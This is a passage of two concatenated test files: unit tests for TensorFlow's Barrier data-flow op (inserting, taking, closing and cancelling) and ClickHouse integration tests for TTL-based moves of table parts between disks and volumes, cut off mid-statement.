insert_0_op = b.insert_many(0, keys, np.array([[], [], []], np.float32))
self.assertEquals(size_t.eval(), [0])
with self.assertRaisesOpError(
".*Tensors with no elements are not supported.*"):
insert_0_op.run()
def testTakeMany(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((), ()),
name="B")
size_t = b.ready_size()
keys = [b"a", b"b", b"c"]
values_0 = [10.0, 20.0, 30.0]
values_1 = [100.0, 200.0, 300.0]
insert_0_op = b.insert_many(0, keys, values_0)
insert_1_op = b.insert_many(1, keys, values_1)
take_t = b.take_many(3)
insert_0_op.run()
insert_1_op.run()
self.assertEquals(size_t.eval(), [3])
indices_val, keys_val, values_0_val, values_1_val = sess.run([
take_t[0], take_t[1], take_t[2][0], take_t[2][1]])
self.assertAllEqual(indices_val, [-2**63] * 3)
for k, v0, v1 in zip(keys, values_0, values_1):
idx = keys_val.tolist().index(k)
self.assertEqual(values_0_val[idx], v0)
self.assertEqual(values_1_val[idx], v1)
def testTakeManySmallBatch(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((), ()),
name="B")
size_t = b.ready_size()
size_i = b.incomplete_size()
keys = [b"a", b"b", b"c", b"d"]
values_0 = [10.0, 20.0, 30.0, 40.0]
values_1 = [100.0, 200.0, 300.0, 400.0]
insert_0_op = b.insert_many(0, keys, values_0)
# Split adding of the second component into two independent operations.
# After insert_1_1_op, we'll have two ready elements in the barrier,
# 2 will still be incomplete.
insert_1_1_op = b.insert_many(1, keys[0:2], values_1[0:2]) # add "a", "b"
insert_1_2_op = b.insert_many(1, keys[2:3], values_1[2:3]) # add "c"
insert_1_3_op = b.insert_many(1, keys[3:], values_1[3:]) # add "d"
insert_empty_op = b.insert_many(0, [], [])
close_op = b.close()
close_op_final = b.close(cancel_pending_enqueues=True)
index_t, key_t, value_list_t = b.take_many(3, allow_small_batch=True)
insert_0_op.run()
insert_1_1_op.run()
close_op.run()
# Now we have a closed barrier with 2 ready elements. Running take_t
# should return a reduced batch with 2 elements only.
self.assertEquals(size_i.eval(), [2]) # assert that incomplete size = 2
self.assertEquals(size_t.eval(), [2]) # assert that ready size = 2
_, keys_val, values_0_val, values_1_val = sess.run([
index_t, key_t, value_list_t[0], value_list_t[1]
])
# Check that correct values have been returned.
for k, v0, v1 in zip(keys[0:2], values_0[0:2], values_1[0:2]):
idx = keys_val.tolist().index(k)
self.assertEqual(values_0_val[idx], v0)
self.assertEqual(values_1_val[idx], v1)
# The next insert completes the element with key "c". The next take_t
# should return a batch with just 1 element.
insert_1_2_op.run()
self.assertEquals(size_i.eval(), [1]) # assert that incomplete size = 1
self.assertEquals(size_t.eval(), [1]) # assert that ready size = 1
_, keys_val, values_0_val, values_1_val = sess.run([
index_t, key_t, value_list_t[0], value_list_t[1]
])
# Check that correct values have been returned.
for k, v0, v1 in zip(keys[2:3], values_0[2:3], values_1[2:3]):
idx = keys_val.tolist().index(k)
self.assertEqual(values_0_val[idx], v0)
self.assertEqual(values_1_val[idx], v1)
# Adding nothing ought to work, even if the barrier is closed.
insert_empty_op.run()
# currently keys "a" and "b" are not in the barrier, adding them
# again after it has been closed, ought to cause failure.
with self.assertRaisesOpError("is closed"):
insert_1_1_op.run()
close_op_final.run()
# These ops should fail because the barrier has now been closed with
# cancel_pending_enqueues = True.
with self.assertRaisesOpError("is closed"):
insert_empty_op.run()
with self.assertRaisesOpError("is closed"):
insert_1_3_op.run()
def testUseBarrierWithShape(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((2, 2), (8,)),
name="B")
size_t = b.ready_size()
keys = [b"a", b"b", b"c"]
values_0 = np.array(
[[[10.0] * 2] * 2, [[20.0] * 2] * 2, [[30.0] * 2] * 2], np.float32)
values_1 = np.array([[100.0] * 8, [200.0] * 8, [300.0] * 8],
np.float32)
insert_0_op = b.insert_many(0, keys, values_0)
insert_1_op = b.insert_many(1, keys, values_1)
take_t = b.take_many(3)
insert_0_op.run()
insert_1_op.run()
self.assertEquals(size_t.eval(), [3])
indices_val, keys_val, values_0_val, values_1_val = sess.run([
take_t[0], take_t[1], take_t[2][0], take_t[2][1]])
self.assertAllEqual(indices_val, [-2**63] * 3)
self.assertShapeEqual(keys_val, take_t[1])
self.assertShapeEqual(values_0_val, take_t[2][0])
self.assertShapeEqual(values_1_val, take_t[2][1])
for k, v0, v1 in zip(keys, values_0, values_1):
idx = keys_val.tolist().index(k)
self.assertAllEqual(values_0_val[idx], v0)
self.assertAllEqual(values_1_val[idx], v1)
def testParallelInsertMany(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(tf.float32, shapes=())
size_t = b.ready_size()
keys = [str(x).encode("ascii") for x in range(10)]
values = [float(x) for x in range(10)]
insert_ops = [b.insert_many(0, [k], [v]) for k, v in zip(keys, values)]
take_t = b.take_many(10)
sess.run(insert_ops)
self.assertEquals(size_t.eval(), [10])
indices_val, keys_val, values_val = sess.run(
[take_t[0], take_t[1], take_t[2][0]])
self.assertAllEqual(indices_val, [-2**63 + x for x in range(10)])
for k, v in zip(keys, values):
idx = keys_val.tolist().index(k)
self.assertEqual(values_val[idx], v)
def testParallelTakeMany(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(tf.float32, shapes=())
size_t = b.ready_size()
keys = [str(x).encode("ascii") for x in range(10)]
values = [float(x) for x in range(10)]
insert_op = b.insert_many(0, keys, values)
take_t = [b.take_many(1) for _ in keys]
insert_op.run()
self.assertEquals(size_t.eval(), [10])
index_fetches = []
key_fetches = []
value_fetches = []
for ix_t, k_t, v_t in take_t:
index_fetches.append(ix_t)
key_fetches.append(k_t)
value_fetches.append(v_t[0])
vals = sess.run(index_fetches + key_fetches + value_fetches)
index_vals = vals[:len(keys)]
key_vals = vals[len(keys):2 * len(keys)]
value_vals = vals[2 * len(keys):]
taken_elems = []
for k, v in zip(key_vals, value_vals):
taken_elems.append((k[0], v[0]))
self.assertAllEqual(np.hstack(index_vals), [-2**63] * 10)
self.assertItemsEqual(
zip(keys, values),
[(k[0], v[0]) for k, v in zip(key_vals, value_vals)])
def testBlockingTakeMany(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(tf.float32, shapes=())
keys = [str(x).encode("ascii") for x in range(10)]
values = [float(x) for x in range(10)]
insert_ops = [b.insert_many(0, [k], [v]) for k, v in zip(keys, values)]
take_t = b.take_many(10)
def take():
indices_val, keys_val, values_val = sess.run(
[take_t[0], take_t[1], take_t[2][0]])
self.assertAllEqual(
indices_val, [int(x.decode("ascii")) - 2**63 for x in keys_val])
self.assertItemsEqual(zip(keys, values), zip(keys_val, values_val))
t = self.checkedThread(target=take)
t.start()
time.sleep(0.1)
for insert_op in insert_ops:
insert_op.run()
t.join()
def testParallelInsertManyTakeMany(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.int64), shapes=((), (2,)))
num_iterations = 100
keys = [str(x) for x in range(10)]
values_0 = np.asarray(range(10), dtype=np.float32)
      values_1 = np.asarray([[x + 1, x + 2] for x in range(10)], dtype=np.int64)
keys_i = lambda i: [("%d:%s" % (i, k)).encode("ascii") for k in keys]
insert_0_ops = [
b.insert_many(0, keys_i(i), values_0 + i)
for i in range(num_iterations)]
insert_1_ops = [
b.insert_many(1, keys_i(i), values_1 + i)
for i in range(num_iterations)]
take_ops = [b.take_many(10) for _ in range(num_iterations)]
def take(sess, i, taken):
indices_val, keys_val, values_0_val, values_1_val = sess.run(
[take_ops[i][0], take_ops[i][1],
take_ops[i][2][0], take_ops[i][2][1]])
taken.append({"indices": indices_val,
"keys": keys_val,
"values_0": values_0_val,
"values_1": values_1_val})
def insert(sess, i):
sess.run([insert_0_ops[i], insert_1_ops[i]])
taken = []
take_threads = [
self.checkedThread(target=take, args=(sess, i, taken))
for i in range(num_iterations)]
insert_threads = [
self.checkedThread(target=insert, args=(sess, i))
for i in range(num_iterations)]
for t in take_threads:
t.start()
time.sleep(0.1)
for t in insert_threads:
t.start()
for t in take_threads:
t.join()
for t in insert_threads:
t.join()
self.assertEquals(len(taken), num_iterations)
flatten = lambda l: [item for sublist in l for item in sublist]
all_indices = sorted(flatten([t_i["indices"] for t_i in taken]))
all_keys = sorted(flatten([t_i["keys"] for t_i in taken]))
expected_keys = sorted(flatten(
[keys_i(i) for i in range(num_iterations)]))
expected_indices = sorted(flatten(
[-2**63 + j] * 10 for j in range(num_iterations)))
self.assertAllEqual(all_indices, expected_indices)
self.assertAllEqual(all_keys, expected_keys)
for taken_i in taken:
outer_indices_from_keys = np.array(
[int(k.decode("ascii").split(":")[0]) for k in taken_i["keys"]])
inner_indices_from_keys = np.array(
[int(k.decode("ascii").split(":")[1]) for k in taken_i["keys"]])
self.assertAllEqual(taken_i["values_0"],
outer_indices_from_keys + inner_indices_from_keys)
expected_values_1 = np.vstack(
(1 + outer_indices_from_keys + inner_indices_from_keys,
2 + outer_indices_from_keys + inner_indices_from_keys)).T
self.assertAllEqual(taken_i["values_1"], expected_values_1)
def testClose(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((), ()),
name="B")
size_t = b.ready_size()
incomplete_t = b.incomplete_size()
keys = [b"a", b"b", b"c"]
values_0 = [10.0, 20.0, 30.0]
values_1 = [100.0, 200.0, 300.0]
insert_0_op = b.insert_many(0, keys, values_0)
insert_1_op = b.insert_many(1, keys, values_1)
close_op = b.close()
fail_insert_op = b.insert_many(0, ["f"], [60.0])
take_t = b.take_many(3)
take_too_many_t = b.take_many(4)
self.assertEquals(size_t.eval(), [0])
self.assertEquals(incomplete_t.eval(), [0])
insert_0_op.run()
self.assertEquals(size_t.eval(), [0])
self.assertEquals(incomplete_t.eval(), [3])
close_op.run()
# This op should fail because the barrier is closed.
with self.assertRaisesOpError("is closed"):
fail_insert_op.run()
# This op should succeed because the barrier has not cancelled
# pending enqueues
insert_1_op.run()
self.assertEquals(size_t.eval(), [3])
self.assertEquals(incomplete_t.eval(), [0])
# This op should fail because the barrier is closed.
with self.assertRaisesOpError("is closed"):
fail_insert_op.run()
# This op should fail because we requested more elements than are
# available in incomplete + ready queue.
with self.assertRaisesOpError(
r"is closed and has insufficient elements "
r"\(requested 4, total size 3\)"):
sess.run(take_too_many_t[0]) # Sufficient to request just the indices
# This op should succeed because there are still completed elements
# to process.
indices_val, keys_val, values_0_val, values_1_val = sess.run(
[take_t[0], take_t[1], take_t[2][0], take_t[2][1]])
self.assertAllEqual(indices_val, [-2**63] * 3)
for k, v0, v1 in zip(keys, values_0, values_1):
idx = keys_val.tolist().index(k)
self.assertEqual(values_0_val[idx], v0)
self.assertEqual(values_1_val[idx], v1)
# This op should fail because there are no more completed elements and
# the queue is closed.
with self.assertRaisesOpError("is closed and has insufficient elements"):
sess.run(take_t[0])
def testCancel(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((), ()),
name="B")
size_t = b.ready_size()
incomplete_t = b.incomplete_size()
keys = [b"a", b"b", b"c"]
values_0 = [10.0, 20.0, 30.0]
values_1 = [100.0, 200.0, 300.0]
insert_0_op = b.insert_many(0, keys, values_0)
insert_1_op = b.insert_many(1, keys[0:2], values_1[0:2])
insert_2_op = b.insert_many(1, keys[2:], values_1[2:])
cancel_op = b.close(cancel_pending_enqueues=True)
fail_insert_op = b.insert_many(0, ["f"], [60.0])
take_t = b.take_many(2)
take_too_many_t = b.take_many(3)
self.assertEquals(size_t.eval(), [0])
insert_0_op.run()
insert_1_op.run()
self.assertEquals(size_t.eval(), [2])
self.assertEquals(incomplete_t.eval(), [1])
cancel_op.run()
# This op should fail because the queue is closed.
with self.assertRaisesOpError("is closed"):
fail_insert_op.run()
# This op should fail because the queue is cancelled.
with self.assertRaisesOpError("is closed"):
insert_2_op.run()
# This op should fail because we requested more elements than are
# available in incomplete + ready queue.
with self.assertRaisesOpError(
r"is closed and has insufficient elements "
r"\(requested 3, total size 2\)"):
sess.run(take_too_many_t[0]) # Sufficient to request just the indices
# This op should succeed because there are still completed elements
# to process.
indices_val, keys_val, values_0_val, values_1_val = sess.run(
[take_t[0], take_t[1], take_t[2][0], take_t[2][1]])
self.assertAllEqual(indices_val, [-2**63] * 2)
for k, v0, v1 in zip(keys[0:2], values_0[0:2], values_1[0:2]):
idx = keys_val.tolist().index(k)
self.assertEqual(values_0_val[idx], v0)
self.assertEqual(values_1_val[idx], v1)
# This op should fail because there are no more completed elements and
# the queue is closed.
with self.assertRaisesOpError("is closed and has insufficient elements"):
sess.run(take_t[0])
def _testClosedEmptyBarrierTakeManyAllowSmallBatchRaises(self, cancel):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.float32), shapes=((), ()), name="B")
take_t = b.take_many(1, allow_small_batch=True)
sess.run(b.close(cancel))
with self.assertRaisesOpError("is closed and has insufficient elements"):
sess.run(take_t)
def testClosedEmptyBarrierTakeManyAllowSmallBatchRaises(self):
self._testClosedEmptyBarrierTakeManyAllowSmallBatchRaises(cancel=False)
self._testClosedEmptyBarrierTakeManyAllowSmallBatchRaises(cancel=True)
def _testParallelInsertManyTakeManyCloseHalfwayThrough(self, cancel):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.int64), shapes=((), (2,)))
num_iterations = 50
keys = [str(x) for x in range(10)]
values_0 = np.asarray(range(10), dtype=np.float32)
values_1 = np.asarray([[x + 1, x + 2] for x in range(10)], dtype=np.int64)
keys_i = lambda i: [("%d:%s" % (i, k)).encode("ascii") for k in keys]
insert_0_ops = [
b.insert_many(0, keys_i(i), values_0 + i)
for i in range(num_iterations)]
insert_1_ops = [
b.insert_many(1, keys_i(i), values_1 + i)
for i in range(num_iterations)]
take_ops = [b.take_many(10) for _ in range(num_iterations)]
close_op = b.close(cancel_pending_enqueues=cancel)
def take(sess, i, taken):
try:
indices_val, unused_keys_val, unused_val_0, unused_val_1 = sess.run(
[take_ops[i][0], take_ops[i][1],
take_ops[i][2][0], take_ops[i][2][1]])
taken.append(len(indices_val))
except tf.errors.OutOfRangeError:
taken.append(0)
def insert(sess, i):
try:
sess.run([insert_0_ops[i], insert_1_ops[i]])
except tf.errors.CancelledError:
pass
taken = []
take_threads = [
self.checkedThread(target=take, args=(sess, i, taken))
for i in range(num_iterations)]
insert_threads = [
self.checkedThread(target=insert, args=(sess, i))
for i in range(num_iterations)]
first_half_insert_threads = insert_threads[:num_iterations//2]
second_half_insert_threads = insert_threads[num_iterations//2:]
for t in take_threads:
t.start()
for t in first_half_insert_threads:
t.start()
for t in first_half_insert_threads:
t.join()
close_op.run()
for t in second_half_insert_threads:
t.start()
for t in take_threads:
t.join()
for t in second_half_insert_threads:
t.join()
self.assertEqual(
sorted(taken), [0] * (num_iterations//2) + [10] * (num_iterations//2))
def testParallelInsertManyTakeManyCloseHalfwayThrough(self):
self._testParallelInsertManyTakeManyCloseHalfwayThrough(cancel=False)
def testParallelInsertManyTakeManyCancelHalfwayThrough(self):
self._testParallelInsertManyTakeManyCloseHalfwayThrough(cancel=True)
def _testParallelPartialInsertManyTakeManyCloseHalfwayThrough(self, cancel):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.int64), shapes=((), (2,)))
num_iterations = 100
keys = [str(x) for x in range(10)]
values_0 = np.asarray(range(10), dtype=np.float32)
values_1 = np.asarray([[x + 1, x + 2] for x in range(10)], dtype=np.int64)
keys_i = lambda i: [("%d:%s" % (i, k)).encode("ascii") for k in keys]
insert_0_ops = [
b.insert_many(0, keys_i(i), values_0 + i, name="insert_0_%d" % i)
for i in range(num_iterations)]
close_op = b.close(cancel_pending_enqueues=cancel)
take_ops = [b.take_many(10, name="take_%d" % i)
for i in range(num_iterations)]
# insert_1_ops will only run after closure
insert_1_ops = [
b.insert_many(1, keys_i(i), values_1 + i, name="insert_1_%d" % i)
for i in range(num_iterations)]
def take(sess, i, taken):
if cancel:
try:
indices_val, unused_keys_val, unused_val_0, unused_val_1 = sess.run(
[take_ops[i][0], take_ops[i][1],
take_ops[i][2][0], take_ops[i][2][1]])
taken.append(len(indices_val))
except tf.errors.OutOfRangeError:
taken.append(0)
else:
indices_val, unused_keys_val, unused_val_0, unused_val_1 = sess.run(
[take_ops[i][0], take_ops[i][1],
take_ops[i][2][0], take_ops[i][2][1]])
taken.append(len(indices_val))
def insert_0(sess, i):
insert_0_ops[i].run(session=sess)
def insert_1(sess, i):
if cancel:
try:
insert_1_ops[i].run(session=sess)
except tf.errors.CancelledError:
pass
else:
insert_1_ops[i].run(session=sess)
taken = []
take_threads = [
self.checkedThread(target=take, args=(sess, i, taken))
for i in range(num_iterations)]
insert_0_threads = [
self.checkedThread(target=insert_0, args=(sess, i))
for i in range(num_iterations)]
insert_1_threads = [
self.checkedThread(target=insert_1, args=(sess, i))
for i in range(num_iterations)]
for t in insert_0_threads:
t.start()
for t in insert_0_threads:
t.join()
for t in take_threads:
t.start()
close_op.run()
for t in insert_1_threads:
t.start()
for t in take_threads:
t.join()
for t in insert_1_threads:
t.join()
if cancel:
self.assertEqual(taken, [0] * num_iterations)
else:
self.assertEqual(taken, [10] * num_iterations)
def testParallelPartialInsertManyTakeManyCloseHalfwayThrough(self):
self._testParallelPartialInsertManyTakeManyCloseHalfwayThrough(cancel=False)
def testParallelPartialInsertManyTakeManyCancelHalfwayThrough(self):
self._testParallelPartialInsertManyTakeManyCloseHalfwayThrough(cancel=True)
def testIncompatibleSharedBarrierErrors(self):
with self.test_session():
# Do component types and shapes.
b_a_1 = data_flow_ops.Barrier((tf.float32,), shapes=(()),
shared_name="b_a")
b_a_2 = data_flow_ops.Barrier((tf.int32,), shapes=(()),
shared_name="b_a")
b_a_1.barrier_ref.eval()
with self.assertRaisesOpError("component types"):
b_a_2.barrier_ref.eval()
b_b_1 = data_flow_ops.Barrier((tf.float32,), shapes=(()),
shared_name="b_b")
b_b_2 = data_flow_ops.Barrier(
(tf.float32, tf.int32),
shapes=((), ()),
shared_name="b_b")
b_b_1.barrier_ref.eval()
with self.assertRaisesOpError("component types"):
b_b_2.barrier_ref.eval()
b_c_1 = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((2, 2), (8,)),
shared_name="b_c")
b_c_2 = data_flow_ops.Barrier(
(tf.float32, tf.float32), shared_name="b_c")
b_c_1.barrier_ref.eval()
with self.assertRaisesOpError("component shapes"):
b_c_2.barrier_ref.eval()
b_d_1 = data_flow_ops.Barrier(
(tf.float32, tf.float32), shapes=((), ()),
shared_name="b_d")
b_d_2 = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((2, 2), (8,)),
shared_name="b_d")
b_d_1.barrier_ref.eval()
with self.assertRaisesOpError("component shapes"):
b_d_2.barrier_ref.eval()
b_e_1 = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((2, 2), (8,)),
shared_name="b_e")
b_e_2 = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((2, 5), (8,)),
shared_name="b_e")
b_e_1.barrier_ref.eval()
with self.assertRaisesOpError("component shapes"):
b_e_2.barrier_ref.eval()
if __name__ == "__main__":
tf.test.main()
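# A minimal usage sketch of the Barrier API exercised above (comments only,
# assuming TF 1.x graph mode as in these tests): each component is inserted
# separately under the same string keys, and take_many only returns elements
# once every component has been supplied.
#
#   b = data_flow_ops.Barrier((tf.float32,), shapes=((),), name="sketch")
#   insert = b.insert_many(0, [b"k1", b"k2"], [1.0, 2.0])
#   take = b.take_many(2)  # returns (indices, keys, list of value tensors)
#   with tf.Session() as sess:
#       insert.run()
#       indices, keys, values = sess.run([take[0], take[1], take[2][0]])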
|
test.py
|
import random
import string
import threading
import time
from multiprocessing.dummy import Pool
import pytest
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1',
main_configs=['configs/logs_config.xml', "configs/config.d/instant_moves.xml",
"configs/config.d/storage_configuration.xml",
"configs/config.d/cluster.xml", ],
with_zookeeper=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 1})
node2 = cluster.add_instance('node2',
main_configs=['configs/logs_config.xml', "configs/config.d/instant_moves.xml",
"configs/config.d/storage_configuration.xml",
"configs/config.d/cluster.xml", ],
with_zookeeper=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 2})
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
def get_random_string(length):
    symbols = string.ascii_uppercase + string.digits
    return ''.join(random.choice(symbols) for _ in range(length))
def get_used_disks_for_table(node, table_name, partition=None):
if partition is None:
suffix = ""
else:
suffix = "and partition='{}'".format(partition)
return node.query("""
SELECT disk_name
FROM system.parts
WHERE table == '{name}' AND active=1 {suffix}
ORDER BY modification_time
""".format(name=table_name, suffix=suffix)).strip().split('\n')
def check_used_disks_with_retry(node, table_name, expected_disks, retries):
for _ in range(retries):
used_disks = get_used_disks_for_table(node, table_name)
if set(used_disks).issubset(expected_disks):
return True
time.sleep(0.5)
return False
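# Illustrative use of the two helpers above (a sketch; the table and disk names
# are hypothetical): after inserting into a table that has a TTL move rule,
# poll system.parts until all active parts land on the expected disks.
#
#   node1.query("INSERT INTO some_ttl_table (s1, d1) VALUES ('x', now())")
#   assert check_used_disks_with_retry(node1, "some_ttl_table", {"external"}, 20)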
@pytest.mark.parametrize("name,engine,alter", [
("mt_test_rule_with_invalid_destination", "MergeTree()", 0),
("replicated_mt_test_rule_with_invalid_destination",
"ReplicatedMergeTree('/clickhouse/replicated_test_rule_with_invalid_destination', '1')", 0),
("mt_test_rule_with_invalid_destination", "MergeTree()", 1),
("replicated_mt_test_rule_with_invalid_destination",
"ReplicatedMergeTree('/clickhouse/replicated_test_rule_with_invalid_destination', '1')", 1),
])
def test_rule_with_invalid_destination(started_cluster, name, engine, alter):
try:
def get_command(x, policy):
x = x or ""
if alter and x:
return """
ALTER TABLE {name} MODIFY TTL {expression}
""".format(expression=x, name=name)
else:
return """
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
{expression}
SETTINGS storage_policy='{policy}'
""".format(expression=x, name=name, engine=engine, policy=policy)
if alter:
node1.query(get_command(None, "small_jbod_with_external"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO DISK 'unknown'", "small_jbod_with_external"))
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
if alter:
node1.query(get_command(None, "small_jbod_with_external"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO VOLUME 'unknown'", "small_jbod_with_external"))
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
if alter:
node1.query(get_command(None, "only_jbod2"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO DISK 'jbod1'", "only_jbod2"))
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
if alter:
node1.query(get_command(None, "only_jbod2"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO VOLUME 'external'", "only_jbod2"))
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_inserts_to_disk_do_not_work", "MergeTree()", 0),
("replicated_mt_test_inserts_to_disk_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_disk_do_not_work', '1')", 0),
("mt_test_inserts_to_disk_work", "MergeTree()", 1),
("replicated_mt_test_inserts_to_disk_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_disk_work', '1')", 1),
])
def test_inserts_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(
time.time() - 1 if i > 0 or positive else time.time() + 300))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
try:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
except:
pass
@pytest.mark.parametrize("name,engine", [
("mt_test_moves_work_after_storage_policy_change", "MergeTree()"),
("replicated_mt_test_moves_work_after_storage_policy_change",
"ReplicatedMergeTree('/clickhouse/test_moves_work_after_storage_policy_change', '1')"),
])
def test_moves_work_after_storage_policy_change(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
""".format(name=name, engine=engine))
node1.query(
"""ALTER TABLE {name} MODIFY SETTING storage_policy='default_with_small_jbod_with_external'""".format(
name=name))
# Second expression is preferred because d1 > now()-3600.
node1.query(
"""ALTER TABLE {name} MODIFY TTL now()-3600 TO DISK 'jbod1', d1 TO DISK 'external'""".format(name=name))
wait_expire_1 = 12
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
wait_expire_1_thread.join()
time.sleep(wait_expire_2 / 2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_moves_to_disk_do_not_work", "MergeTree()", 0),
("replicated_mt_test_moves_to_disk_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_do_not_work', '1')", 0),
("mt_test_moves_to_disk_work", "MergeTree()", 1),
("replicated_mt_test_moves_to_disk_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_work', '1')", 1),
])
def test_moves_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 12
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)),
"toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
wait_expire_1_thread.join()
time.sleep(wait_expire_2 / 2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_moves_to_volume_work", "MergeTree()"),
("replicated_mt_test_moves_to_volume_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_volume_work', '1')"),
])
def test_moves_to_volume_work(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 TO VOLUME 'external'
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 10
time_1 = time.time() + wait_expire_1
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for p in range(2):
data = [] # 10MB in total
for i in range(5):
data.append(
(str(p), "'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1))) # 1MB row
node1.query(
"INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {'jbod1', 'jbod2'}
wait_expire_1_thread.join()
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_inserts_to_volume_do_not_work", "MergeTree()", 0),
("replicated_mt_test_inserts_to_volume_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_volume_do_not_work', '1')", 0),
("mt_test_inserts_to_volume_work", "MergeTree()", 1),
("replicated_mt_test_inserts_to_volume_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_volume_work', '1')", 1),
])
def test_inserts_to_volume_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
